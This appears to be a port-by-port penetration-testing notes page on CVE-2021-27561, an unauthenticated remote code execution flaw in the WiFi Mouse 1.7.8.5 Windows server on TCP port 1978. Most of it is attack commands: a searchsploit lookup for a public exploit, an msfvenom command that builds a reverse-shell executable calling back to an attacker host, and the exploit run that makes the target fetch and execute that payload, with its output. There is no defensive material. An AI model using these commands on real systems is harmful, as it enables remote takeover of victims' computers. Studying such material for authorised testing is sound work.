WiFi Mouse (1978)

WiFi Mouse 1.7.8.5, a Windows server component of a mobile app that lets users control their PC via smartphone (mouse, keyboard, etc.), is vulnerable to unauthenticated remote code execution over TCP port 1978 due to insecure command parsing — CVE-2021-27561.

# Search for PoC
$ searchsploit WiFi Mouse
...
WiFi Mouse 1.7.8.5 - Remote Code Execution(v2) | windows/remote/50972.py

# Generate the payload
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=4444 -f exe -o 1978.exe

# Use the exploit
$ python3 50972.py hermes 192.168.45.154:8888 1978.exe
[+] 3..2..1..

[+] *Super fast hacker typing*
[+] Retrieving payload
[+] Done! Check Your Listener?

PreviousDISTCC (3632)NextFreeSWITCH (8021)

Last updated 27 days ago

Was this helpful?